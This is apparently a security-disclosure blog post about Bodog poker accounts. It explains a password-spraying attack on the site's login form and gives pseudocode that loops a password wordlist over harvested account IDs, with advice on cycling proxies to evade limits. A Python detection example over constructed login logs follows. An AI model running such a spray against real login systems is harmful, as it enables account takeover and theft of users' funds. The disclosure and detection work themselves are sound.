Bodog Account Security Vulnerability: PartyCrasher Exploit Part 2

Yesterday we posted an article about how Bodog’s anonymous tables weren’t so anonymous after all. We accompanied this with a video showing how this was true:

Bodog’s response was to cover it up and not really address the root problem: The violation of server-client trust. They went on to say:

Your money is and has always been safe at Bodog. If you are concerned about the security of your account, having access to an account number is similar to having a screenname before our latest update.

In a future blog post we’ll talk about how the only secure method of user authentication is the Two-Factor Model, but that’s not the focus today.

As we like to say here at hhSmithy:

Showing Usernames / Account IDs is Safe… Right?

Bodog claims that showing the account IDs of a user is inherently safe, because a hacker would still need your password to log in. Forgetting for a second that this claim implicitly admits that they blatantly lied about having anonymous tables, they’re saying that their system is secure because an attack on the users’ passwords is impossible on Bodog.

Well, maybe it is and maybe it isn’t. According to Gus Fritchie and Mike Wright, Bodog’s software has numerous cross-site scripting (XSS) vulnerabilities and an exposed web API for logging in. (source: Getting F***** on the River, Defcon 19)

When we looked into these problems, many of them still existed. However, we’ll only talk about one method of attack on the web API, since it’s vulnerable to a brute force attempt.

The Attack: Lax Security in their Log-In Form

On Bodog’s log-in form, they will lock someone out for multiple attempts on a given user ID with the incorrect password. The lockout period is a few minutes, which ensures someone can’t brute force a single username in a reasonable timeframe. However, the shotgun method works fine! By writing a script that gathers a bunch of usernames from a tool like PartyCrasher (not publicly available, please stop asking) and pairing this with a wordlist of passwords, you can try every user you’ve found with every password – ensuring you don’t hit the timeout for any given username!

Since they don’t ban on IP, no proxies are necessary – but implementing them isn’t hard, either. You can find free lists of proxies and purchase the rights to thousands more IPs for less than $100/month, and you can cycle your brute force script through these proxies – perhaps limiting the attack to 200 attempts per proxy.

The video below details the attack with a voiceover explanation:

Pseudocode for the Attack

Here’s the pseudocode shown in the video, which gives you a basic outline of how a hacker might start a script to bust various user passwords. Remember, Bodog only enforces a six-character password, without the need for mixed case, special characters, numbers, or anything exciting. I’ve made multiple accounts there with the password “password” or “bodogpoker” with no problem. You can be sure that plenty of users have simple passwords, too.

    // username and password global lists
    username = array('4025500', '1240159', '8856161', ...)
    password = array('password', 'bodogpoker', 'badbeats', ...)

    // attempts a bodog login with a username and password
    function attemptBodogLogin(user, pass)
        failure = 'Required information' // failure string
        response = webFormSubmit('https://www.bodog.eu/account/app/Login', user, pass) // submit a form with user and password
        if (response == failure)
            return FALSE // nope, user and pass pair failed
        else
            return TRUE // hacked!

    // tells you if the bodog login succeeds and prints account details
    function hackUser(user, pass)
        result = attemptBodogLogin(user, pass)
        if (result == TRUE)
            print 'Broken password! User: ' . user
            print 'Password: ' . pass

    // main function that is called first, nested for loop (O(n*m) for nerds)
    function main()
        foreach(password as pass) // for every password in the list
            foreach(username as user) // for every username in the list
                hackUser(user, pass) // try a user with the first pass
            endforeach // next user, try the same password
        endforeach // next password, loop through the userlist again
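The per-username lockout described above never sees the shotgun loop, because each account fails only once per password. The detection logic below is an added example, not code from the original post or from Bodog's software; it runs over constructed login-log lines (the log format, IP addresses and thresholds are assumptions) and counts what a defender has to count instead: distinct accounts failing from one source IP, and site-wide accounts carrying a single failure, which survives the proxy cycling described above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample login-log lines: timestamp, source IP, account ID, outcome.
# 198.51.100.7 fails once per account (the shotgun); 203.0.113.9 is a real user.
SAMPLE_LOG = """\
2011-08-20T10:00:01 198.51.100.7 4025500 FAIL
2011-08-20T10:00:02 198.51.100.7 1240159 FAIL
2011-08-20T10:00:03 198.51.100.7 8856161 FAIL
2011-08-20T10:00:04 198.51.100.7 5512380 FAIL
2011-08-20T10:00:05 198.51.100.7 7730021 FAIL
2011-08-20T10:00:06 198.51.100.7 9004417 FAIL
2011-08-20T10:00:10 203.0.113.9 1240159 FAIL
2011-08-20T10:00:15 203.0.113.9 1240159 FAIL
2011-08-20T10:00:20 203.0.113.9 1240159 OK
"""

def parse_line(line):
    ts, ip, user, outcome = line.split()
    return datetime.fromisoformat(ts), ip, user, outcome

def detect_spray(log_text, window=timedelta(minutes=10), per_ip_threshold=5):
    """Source IPs that failed against >= per_ip_threshold distinct accounts within
    any window. Counting accounts per source, not failures per account, sees the spray."""
    failures = defaultdict(list)  # ip -> [(timestamp, account)] in log order
    for line in log_text.splitlines():
        ts, ip, user, outcome = parse_line(line)
        if outcome == "FAIL":
            failures[ip].append((ts, user))
    flagged = set()
    for ip, events in failures.items():
        start = 0  # sliding window over this IP's failures
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({u for _, u in events[start:end + 1]}) >= per_ip_threshold:
                flagged.add(ip)
                break
    return flagged

def single_failure_accounts(log_text):
    """Accounts with exactly one failure. A spray cycled through proxies stays under
    every per-IP threshold, but site-wide it still leaves one failure on many accounts."""
    per_user = defaultdict(int)
    for line in log_text.splitlines():
        _, _, user, outcome = parse_line(line)
        if outcome == "FAIL":
            per_user[user] += 1
    return {u for u, n in per_user.items() if n == 1}
```

The size of the single-failure set only means something against a baseline for the site's normal traffic; a sudden jump in it, with no single IP over threshold, is the distributed version of the same attack.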

Conclusion

Bodog and other sites like it must subject themselves to independent analysis if they ever want to claim that they’re secure. There are numerous hackers out there doing exactly what we’re doing without disclosing anything. They’re stealing money left and right and using poor software code to write exploitative bots. The only poker site that even comes close to doing a good job is PokerStars, and it’s not even clear that some attacks won’t work there.

The need for independent analysis has never been greater with the possibility of legalization of online poker. It comes hand in hand with regulation. Demand it.
